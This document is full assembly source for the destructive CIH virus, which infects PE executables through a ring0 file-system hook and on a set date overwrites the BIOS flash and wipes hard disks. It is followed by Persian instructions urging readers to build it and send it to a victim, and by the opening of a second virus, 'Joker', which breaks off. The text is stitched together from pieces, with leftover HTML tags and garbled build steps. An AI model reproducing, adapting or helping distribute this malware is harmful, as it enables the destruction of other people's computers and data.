db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize

OriginalAppEXE ENDS

; ****************************************************************************
; * My Virus Game *
; ****************************************************************************

; *********************************************************
; * Constant Define *
; *********************************************************

TRUE = 1
FALSE = 0

DEBUG = TRUE

MajorVirusVersion = 1
MinorVirusVersion = 4

VirusVersion = MajorVirusVersion*10h+MinorVirusVersion


IF DEBUG

FirstKillHardDiskNumber = 81h
HookExceptionNumber = 05h

ELSE

FirstKillHardDiskNumber = 80h
HookExceptionNumber = 03h

ENDIF


FileNameBufferSize = 7fh

; *********************************************************
; *********************************************************

VirusGame SEGMENT

ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame

; *********************************************************
; * Ring3 Virus Game Initial Program *
; *********************************************************

MyVirusStart:
push ebp

; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************

lea eax, [esp-04h*2]

xor ebx, ebx
xchg eax, fs:[ebx]

call @0
@0:
pop ebx

lea ecx, StopToRunVirusCode-@0[ebx]
push ecx

push eax

; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************

push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;

add ebx, HookExceptionNumber*08h+04h ; ZF = 0

cli

mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point

lea esi, MyExceptionHook-@1[ecx]

push esi

mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address

pop esi

; *************************************
; * Generate Exception to Get Ring0 *
; *************************************

int HookExceptionNumber ; GenerateException
ReturnAddressOfEndException = $

; *************************************
; * Merge All Virus Code Section *
; *************************************

push esi
mov esi, eax

LoopOfMergeAllVirusCodeSection:

mov ecx, [eax-04h]

rep movsb

sub eax, 08h

mov esi, [eax]

or esi, esi
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1

jmp LoopOfMergeAllVirusCodeSection

QuitLoopOfMergeAllVirusCodeSection:

pop esi

; *************************************
; * Generate Exception Again *
; *************************************

int HookExceptionNumber ; GenerateException Again

; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************

ReadyRestoreSE:
sti

xor ebx, ebx

jmp RestoreSE

; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************

StopToRunVirusCode:
@1 = StopToRunVirusCode

xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]

RestoreSE:
pop dword ptr fs:[ebx]
pop eax

; *************************************
; * Return Original App to Execute *
; *************************************

pop ebp

push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack

ret ; Return to Original App Entry Point

; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************

MyExceptionHook:
@2 = MyExceptionHook

jz InstallMyFileSystemApiHook

; *************************************
; * Do My Virus Exist in System !? *
; *************************************

mov ecx, dr0
jecxz AllocateSystemMemoryPage

add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException

; *************************************
; * Return to Ring3 Initial Program *
; *************************************

ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;

iretd

; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************

AllocateSystemMemoryPage:

mov dr0, ebx ; Set the Mark of My Virus Exist in System

push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocate
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, and flags
add esp, 08h*04h

xchg edi, eax ; EDI = SystemMemory Start Address

lea eax, MyVirusStart-@2[esi]

iretd ; Return to Ring3 Initial Program

; *************************************
; * Install My File System Api Hook *
; *************************************

InstallMyFileSystemApiHook:

lea eax, FileSystemApiHook-@6[edi]

push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, and flags

mov dr0, eax ; Save OldFileSystemApiHook Address

pop eax ; EAX = FileSystemApiHook Address

; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], edx

; Modify IFSMgr_InstallFileSystemApiHook Entry Point
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax

cli

jmp ExitRing0Init

; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************

CodeSizeOfMergeVirusCodeSection = offset $

; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; *********************************************************

InstallFileSystemApiHook:
push ebx

call @4 ;
@4: ;
pop ebx ; mov ebx, offset FileSystemApiHook
add ebx, FileSystemApiHook-@4 ;

push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, and flags
pop eax

; Call Original IFSMgr_InstallFileSystemApiHook
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx

push eax

; Call Original IFSMgr_InstallFileSystemApiHook
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx

mov dr0, eax ; Adjust OldFileSystemApiHook Address

pop eax

pop ebx

ret

; *********************************************************
; * Static Data *
; *********************************************************

OldInstallFileSystemApiHook dd ?

; *********************************************************
; * IFSMgr_FileSystemHook *
; *********************************************************

; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; *************************************

FileSystemApiHook:
@3 = FileSystemApiHook

pushad

call @5 ;
@5: ;
pop esi ; mov esi, offset VirusGameDataStartAddress
add esi, VirusGameDataStartAddress-@5

; *************************************
; * Is OnBusy !? *
; *************************************

test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
jnz pIFSFunc ; goto pIFSFunc

; *************************************
; * Is OpenFile !? *
; *************************************

; if ( NotOpenFile )
; goto prevhook
lea ebx, [esp+20h+04h+04h]
cmp dword ptr [ebx], 00000024h
jne prevhook

; *************************************
; * Enable OnBusy *
; *************************************

inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy

; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; *************************************

; mov esi, offset FileNameBuffer
add esi, FileNameBuffer-@6

push esi

mov al, [ebx+04h]
cmp al, 0ffh
je CallUniToBCSPath

add al, 40h
mov ah, ':'

mov [esi], eax

inc esi
inc esi

; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname *
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; *************************************

CallUniToBCSPath:
push 00000000h
push FileNameBufferSize
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
add eax, 04h
push eax
push esi
int 20h ; VXDCall UniToBCSPath
UniToBCSPath = $
dd 00400041h
add esp, 04h*04h

; *************************************
; * Is FileName '.EXE' !? *
; *************************************

; cmp [esi+eax-04h], '.EXE'
cmp [esi+eax-04h], 'EXE.'
pop esi
jne DisableOnBusy

IF DEBUG

; *************************************
; * Only for Debug *
; *************************************

; cmp [esi+eax-06h], 'FUCK'
cmp [esi+eax-06h], 'KCUF'
jne DisableOnBusy

ENDIF

; *************************************
; * Is Open Existing File !? *
; *************************************

; if ( NotOpenExistingFile )
; goto DisableOnBusy
cmp word ptr [ebx+18h], 01h
jne DisableOnBusy

; *************************************
; * Get Attributes of the File *
; *************************************

mov ax, 4300h
int 20h ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO = $
dd 00400032h

jc DisableOnBusy

push ecx

; *************************************
; * Get IFSMgr_Ring0_FileIO Address *
; *************************************

mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
mov edi, [edi]

; *************************************
; * Is Read-Only File !? *
; *************************************

test cl, 01h
jz OpenFile

; *************************************
; * Modify Read-Only File to Write *
; *************************************

mov ax, 4301h
xor ecx, ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Open File *
; *************************************

OpenFile:
xor eax, eax
mov ah, 0d5h
xor ecx, ecx
xor edx, edx
inc edx
mov ebx, edx
inc ebx
call edi ; VXDCall IFSMgr_Ring0_FileIO

xchg ebx, eax ; mov ebx, FileHandle

; *************************************
; * Need to Restore *
; * Attributes of the File !? *
; *************************************

pop ecx

pushf

test cl, 01h
jz IsOpenFileOK

; *************************************
; * Restore Attributes of the File *
; *************************************

mov ax, 4301h
call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Is Open File OK !? *
; *************************************

IsOpenFileOK:
popf

jc DisableOnBusy

; *************************************
; * Open File Already Succeed. ^__^ *
; *************************************

push esi ; Push FileNameBuffer Address to Stack

pushf ; Now CF = 0, Push Flag to Stack

add esi, DataBuffer-@7 ; mov esi, offset DataBuffer

; ***************************
; * Get OffsetToNewHeader *
; ***************************

xor eax, eax
mov ah, 0d6h

; For Doing Minimal VirusCode's Length,
; I Save EAX to EBP.
mov ebp, eax

push 00000004h
pop ecx
push 0000003ch
pop edx
call edi ; VXDCall IFSMgr_Ring0_FileIO

mov edx, [esi]

; ***************************
; * Get 'PE\0' Signature *
; * of ImageFileHeader, and *
; * Infected Mark. *
; ***************************

dec edx

mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; * WinZip Self-Extractor *
; * doesn't Have Infected *
; * Mark Because My Virus *
; * doesn't Infect it. *
; ***************************

; cmp [esi], '\0PE\0'
cmp dword ptr [esi], 00455000h
jne CloseFile

; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; *************************************

; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> @8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; *************************************

push ebx ; Save File Handle

push 00h ; Set VirusCodeSectionTableEndMark

; ***************************
; * Let's Set the *
; * Virus' Infected Mark *
; ***************************

push 01h ; Size
push edx ; Pointer of File
push edi ; Address of Buffer

; ***************************
; * Save ESP Register *
; ***************************

mov dr1, esp

; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; ***************************

push eax ; Size

; ***************************
; * Let's Read *
; * Image Header in File *
; ***************************

mov eax, ebp
mov cl, SizeOfImageHeaderToRead
add edx, 07h ; Move EDX to NumberOfSections
call edi ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; ***************************

lea eax, (AddressOfEntryPoint-@8)[edx]
push eax ; Pointer of File

lea eax, (NewAddressOfEntryPoint-@8)[esi]
push eax ; Address of Buffer

; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; ***************************

movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
lea edx, [eax+edx+12h]

; ***************************
; * Let's Get *
; * Total Size of Sections *
; ***************************

mov al, SizeOfScetionTable

; I Assume NumberOfSections <= 0ffh
mov cl, (NumberOfSections-@8)[esi]

mul cl

; ***************************
; * Let's Set Section Table *
; ***************************

; Move ESI to the Start of SectionTable
lea esi, (StartOfSectionTable-@8)[esi]

push eax ; Size
push edx ; Pointer of File
push esi ; Address of Buffer

; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; ***************************

inc ecx
push ecx ; Save NumberOfSections+1

shl ecx, 03h
push ecx ; Save TotalSizeOfVirusCodeSectionTable

add ecx, eax
add ecx, edx

sub ecx, (SizeOfHeaders-@9)[esi]
not ecx
inc ecx

; Save My Virus First Section Code
; Size of Following Section Table...
; ( Not Include the Size of Virus Code Section Table )
push ecx

xchg ecx, eax ; ECX = Size of Section Table

; Save Original Address of Entry Point
mov eax, (AddressOfEntryPoint-@9)[esi]
add eax, (ImageBase-@9)[esi]
mov (OriginalAddressOfEntryPoint-@9)[esi], eax

cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection
jl OnlySetInfectedMark

; ***************************
; * Read All Section Tables *
; ***************************

mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Full Modify the Bug : *
; * WinZip Self-Extractor *
; * Occurs Error... *
; ***************************
; * So When User Opens *
; * WinZip Self-Extractor, *
; * Virus Doesn't Infect it.*
; ***************************
; * First, Virus Gets the *
; * PointerToRawData in the *
; * Second Section Table, *
; * Reads the Section Data, *
; * and Tests the String of *
; * 'WinZip(R)'...... *
; ***************************

xchg eax, ebp

push 00000004h
pop ecx

push edx
mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi]
add edx, 12h

call edi ; VXDCall IFSMgr_Ring0_FileIO

; cmp [esi], 'nZip'
cmp dword ptr [esi], 'piZn'
je NotSetInfectedMark

pop edx

; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; ***************************

; EBX = My Virus First Section Code
; Size of Following Section Table
pop ebx
pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
pop ecx ; ECX = NumberOfSections+1

push edi ; Size

add edx, ebp
push edx ; Pointer of File

add ebp, esi
push ebp ; Address of Buffer

; ***************************
; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; ***************************

lea eax, [ebp+edi-04h]
mov [eax], ebx

; ***************************
; * Let's Set My Virus *
; * First Section Code *
; ***************************

push ebx ; Size

add edx, edi
push edx ; Pointer of File

lea edi, (MyVirusStart-@9)[esi]
push edi ; Address of Buffer

; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; ***************************

mov (NewAddressOfEntryPoint-@9)[esi], edx

; ***************************
; * Setup Initial Data *
; ***************************

lea edx, [esi-SizeOfScetionTable]
mov ebp, offset VirusSize

jmp StartToWriteCodeToSections

; ***************************
; * Write Code to Sections *
; ***************************

LoopOfWriteCodeToSections:

add edx, SizeOfScetionTable

mov ebx, (SizeOfRawData-@9)[edx]
sub ebx, (VirtualSize-@9)[edx]
jbe EndOfWriteCodeToSections

push ebx ; Size

sub eax, 08h
mov [eax], ebx

mov ebx, (PointerToRawData-@9)[edx]
add ebx, (VirtualSize-@9)[edx]
push ebx ; Pointer of File

push edi ; Address of Buffer

mov ebx, (VirtualSize-@9)[edx]
add ebx, (VirtualAddress-@9)[edx]
add ebx, (ImageBase-@9)[esi]
mov [eax+4], ebx

mov ebx, [eax]
add (VirtualSize-@9)[edx], ebx

; Section contains initialized data ==> 00000040h
; Section can be Read. ==> 40000000h
or (Characteristics-@9)[edx], 40000040h

StartToWriteCodeToSections:

sub ebp, ebx
jbe SetVirusCodeSectionTableEndMark

add edi, ebx ; Move Address of Buffer

EndOfWriteCodeToSections:

loop LoopOfWriteCodeToSections

; ***************************
; * Only Set Infected Mark *
; ***************************

OnlySetInfectedMark:
mov esp, dr1

jmp WriteVirusCodeToFile

; ***************************
; * Not Set Infected Mark *
; ***************************

NotSetInfectedMark:
add esp, 3ch

jmp CloseFile

; ***************************
; * Set Virus Code *
; * Section Table End Mark *
; ***************************

SetVirusCodeSectionTableEndMark:

; Adjust Size of Virus Section Code to Correct Value
add [eax], ebp
add [esp+08h], ebp

; Set End Mark
xor ebx, ebx
mov [eax-04h], ebx

; ***************************
; * When VirusGame Calls *
; * VxDCall, VMM Modifies *
; * the 'int 20h' and the *
; * 'Service Identifier' *
; * to 'Call [XXXXXXXX]'. *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First. ^__^ *
; ***************************

lea eax, (LastVxDCallAddress-2-@9)[esi]

mov cl, VxDCallTableSize

LoopOfRestoreVxDCallID:
mov word ptr [eax], 20cdh

mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
mov [eax+2], edx

movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
sub eax, edx

loop LoopOfRestoreVxDCallID

; ***************************
; * Let's Write *
; * Virus Code to the File *
; ***************************

WriteVirusCodeToFile:
mov eax, dr1
mov ebx, [eax+10h]
mov edi, [eax]

LoopOfWriteVirusCodeToFile:

pop ecx
jecxz SetFileModificationMark

mov esi, ecx
mov eax, 0d601h
pop edx
pop ecx

call edi ; VXDCall IFSMgr_Ring0_FileIO

jmp LoopOfWriteVirusCodeToFile

; ***************************
; * Let's Set CF = 1 ==> *
; * Need to Restore File *
; * Modification Time *
; ***************************

SetFileModificationMark:
pop ebx
pop eax

stc ; Enable CF(Carry Flag)
pushf

; *************************************
; * Close File *
; *************************************

CloseFile:
xor eax, eax
mov ah, 0d7h
call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Need to Restore File Modification *
; * Time !? *
; *************************************

popf
pop esi
jnc IsKillComputer

; *************************************
; * Restore File Modification Time *
; *************************************

mov ebx, edi

mov ax, 4303h
mov ecx, (FileModificationTime-@7)[esi]
mov edi, (FileModificationTime+2-@7)[esi]
call ebx ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Disable OnBusy *
; *************************************

DisableOnBusy:
dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy

; *************************************
; * Call Previous FileSystemApiHook *
; *************************************

prevhook:
popad

mov eax, dr0 ;
jmp [eax] ; Jump to prevhook

; *************************************
; * Call the Function that the IFS *
; * Manager Would Normally Call to *
; * Implement this Particular I/O *
; * Request. *
; *************************************

pIFSFunc:
mov ebx, esp
push dword ptr [ebx+20h+04h+14h] ; Push pioreq
call [ebx+20h+04h] ; Call pIFSFunc
pop ecx ;

mov [ebx+1ch], eax ; Modify EAX Value in Stack

; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the *
; * Returned pioreq. *
; ***************************

cmp dword ptr [ebx+20h+04h+04h], 00000024h
jne QuitMyVirusFileSystemHook

; *****************
; * Get the File *
; * Modification *
; * Date and Time *
; * in DOS Format.*
; *****************

mov eax, [ecx+28h]
mov (FileModificationTime-@6)[esi], eax

; ***************************
; * Quit My Virus' *
; * IFSMgr_FileSystemHook *
; ***************************

QuitMyVirusFileSystemHook:

popad

ret

; *************************************
; * Kill Computer !? ... *^_^* *
; *************************************

IsKillComputer:
; Get Now Day from BIOS CMOS
mov al, 07h
out 70h, al
in al, 71h

xor al, 26h ; ??/26/????

IF DEBUG
jmp DisableOnBusy
ELSE
jnz DisableOnBusy
ENDIF

; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; **************************************

; ***************************
; * Kill BIOS EEPROM *
; ***************************

mov bp, 0cf8h
lea esi, IOForEEPROM-@7[esi]

; ***********************
; * Show BIOS Page in *
; * 000E0000 - 000EFFFF *
; * ( 64 KB ) *
; ***********************

mov edi, 8000384ch
mov dx, 0cfeh
cli
call esi

; ***********************
; * Show BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************

mov di, 0058h
dec edx ; and al,0fh
mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
call esi

; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; * be Writted... *
; ***********************

lea ebx, EnableEEPROMToWrite-@10[esi]

mov eax, 0e5555h
mov ecx, 0e2aaah
call ebx
mov byte ptr [eax], 60h

push ecx
loop $

; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E007F *
; * ( 80h Bytes ) *
; ***********************

xor ah, ah
mov [eax], al

xchg ecx, eax
loop $

; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) *
; * can be Writted... *
; ***********************

mov eax, 0f5555h
pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h

loop $

; ***********************
; * Kill the BIOS Main *
; * ROM Data in Memory *
; * 000FE000 - 000FE07F *
; * ( 80h Bytes ) *
; ***********************

mov ah, 0e0h
mov [eax], al

; ***********************
; * Hide BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
; or al,10h
mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
call esi

; ***************************
; * Kill All HardDisk *
; ***************************************************
; * IOR Structure of IOS_SendCommand Needs *
; ***************************************************
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ***************************************************

KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx

mov esi, esp
sub esp, 0ach

LoopOfKillHardDisk:
int 20h
dd 00100004h ; VXDCall IOS_SendCommand

cmp word ptr [esi+06h], 0017h
je KillNextDataSection

ChangeNextHardDisk:
inc byte ptr [esi+4dh]

jmp LoopOfKillHardDisk

KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber

jmp LoopOfKillHardDisk

; ***************************
; * Enable EEPROM to Write *
; ***************************

EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax], cl
mov [ecx], al

ret

; ***************************
; * IO for EEPROM *
; ***************************

IOForEEPROM:
@10 = IOForEEPROM

xchg eax, edi
xchg edx, ebp
out dx, eax

xchg eax, edi
xchg edx, ebp
in al, dx

BooleanCalculateCode = $
or al, 44h

xchg eax, edi
xchg edx, ebp
out dx, eax

xchg eax, edi
xchg edx, ebp
out dx, al

ret

; *********************************************************
; * Static Data *
; *********************************************************

LastVxDCallAddress = IFSMgr_Ring0_FileIO
VxDCallAddressTable db 00h
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath

VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h
VxDCallTableSize = ($-VxDCallIDTable)/04h

; *********************************************************
; * Virus Version Copyright *
; *********************************************************

VirusVersionCopyright db 'CIH v'
db MajorVirusVersion+'0'
db '.'
db MinorVirusVersion+'0'
db ' TATUNG'

; *********************************************************
; * Virus Size *
; *********************************************************

VirusSize = $
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)

; *********************************************************
; * Dynamic Data *
; *********************************************************

VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress
OnBusy db 0
FileModificationTime dd ?

FileNameBuffer db FileNameBufferSize dup(?)
@7 = FileNameBuffer

DataBuffer = $
@8 = DataBuffer
NumberOfSections dw ?
TimeDateStamp dd ?
SymbolsPointer dd ?
NumberOfSymbols dd ?
SizeOfOptionalHeader dw ?
_Characteristics dw ?
Magic dw ?
LinkerVersion dw ?
SizeOfCode dd ?
SizeOfInitializedData dd ?
SizeOfUninitializedData dd ?
AddressOfEntryPoint dd ?
BaseOfCode dd ?
BaseOfData dd ?
ImageBase dd ?
@9 = $
SectionAlignment dd ?
FileAlignment dd ?
OperatingSystemVersion dd ?
ImageVersion dd ?
SubsystemVersion dd ?
Reserved dd ?
SizeOfImage dd ?
SizeOfHeaders dd ?
SizeOfImageHeaderToRead = $-NumberOfSections

NewAddressOfEntryPoint = DataBuffer ; DWORD
SizeOfImageHeaderToWrite = 04h

StartOfSectionTable = @9
SectionName = StartOfSectionTable ; QWORD
VirtualSize = StartOfSectionTable+08h ; DWORD
VirtualAddress = StartOfSectionTable+0ch ; DWORD
SizeOfRawData = StartOfSectionTable+10h ; DWORD
PointerToRawData = StartOfSectionTable+14h ; DWORD
PointerToRelocations = StartOfSectionTable+18h ; DWORD
PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD
NumberOfRelocations = StartOfSectionTable+20h ; WORD
NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD
Characteristics = StartOfSectionTable+24h ; DWORD
SizeOfScetionTable = Characteristics+04h-SectionName

; *********************************************************
; * Virus Total Need Memory *
; *********************************************************

VirusNeedBaseMemory = $

VirusTotalNeedMemory = @9
; + NumberOfSections(??)*SizeOfScetionTable(28h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)

; *********************************************************
; *********************************************************

VirusGame ENDS

END FileHeader
</body>
</html>
</body>
</html>

برای ساخت این ویروس اول note pad را باز کرده و این کد ها را در آن کپی و پیست نمایید و بعد گزینه file را زده save as را زده بعد آنرا با پسوند bat ذخیره کنید مثلا Joker.bat و save را برای اتمام کار زده و حالا ویروس شما ساخته شد که مواظب باشید روی آن به هیچ وجه کلیک نکنید آنرا برای یکی بفرستید تا سیستم قربانی را به طور خفن داغون کنه. موفق باشید نظر یادتون نره!

title " Joker! virus. Written by The BOOT SECTOR Infector ... "
;
; Joker - This is a remake of the deceased "Joker/Jocker" virus. The original
; had multiple programming errors in it that kept it from replicating.
; My version is much more successful.
;


page 255,80
code segment word public 'code'
assume cs:code,ds:code
org 100h
main proc;edure


;EQUates...
idc equ 69h ;ID character - (note: 69)
cr equ 13 ;ASCII for carriage return
lf equ 10 ;ASCII for line feed

;End codes. These determine what happens after the string is displayed.

terminate equ 0 ;Terminate program after display
halt equ 1 ;Cause the system to hang after display
SimulateCritErr equ 2 ;Simulate the critical error handler
return2host equ 3 ;Resume program immediately
FlashFloppy equ 4 ;Wait for a key, then reset Drive A:
WaitKey equ 5 ;Wait for a key, then resume program
PauseKey equ 6 ;Same thing, but uses a pause message
StackError equ 7 ;Cause a stack overflow (halts system)



tof: ;Top-Of-File
jmp begin ;Skip over program
idchar: db idc ;ID character

